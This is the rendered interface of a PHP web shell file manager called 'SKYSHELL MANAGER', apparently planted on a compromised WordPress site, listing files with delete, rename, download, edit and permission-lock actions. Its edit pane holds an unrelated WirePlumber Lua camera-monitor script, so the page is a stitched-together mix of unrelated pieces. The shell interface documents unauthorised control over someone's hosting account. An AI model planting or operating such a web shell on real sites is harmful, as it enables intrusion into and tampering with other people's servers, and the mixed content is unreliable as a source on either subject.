📁
SKYSHELL MANAGER
PHP v8.0.30
Create
Create
Path:
root
/
home
/
godaofbq
/
besthyperbaric.com
/
wp-includesac411f
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📄
error_log
26869.31 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: enumerate-device.lua
-- WirePlumber -- -- Copyright © 2023 Collabora Ltd. -- @author Ashok Sidipotu <ashok.sidipotu@collabora.com> -- -- SPDX-License-Identifier: MIT cutils = require ("common-utils") log = Log.open_topic ("s-monitors-libcamera") config = {} config.properties = Conf.get_section_as_properties ("monitor.libcamera.properties") function createCamDevice (parent, id, type, factory, properties) source = source or Plugin.find ("standard-event-source") local e = source:call ("create-event", "create-libcamera-device", parent, nil) e:set_data ("device-properties", properties) e:set_data ("factory", factory) e:set_data ("device-sub-id", id) EventDispatcher.push_event (e) end monitor = SpaDevice ("api.libcamera.enum.manager", config.properties) if monitor then monitor:connect ("create-object", createCamDevice) monitor:activate (Feature.SpaDevice.ENABLED) else log:notice ("PipeWire's libcamera SPA plugin is missing or broken. " .. "Some camera types may not be supported.") end
Save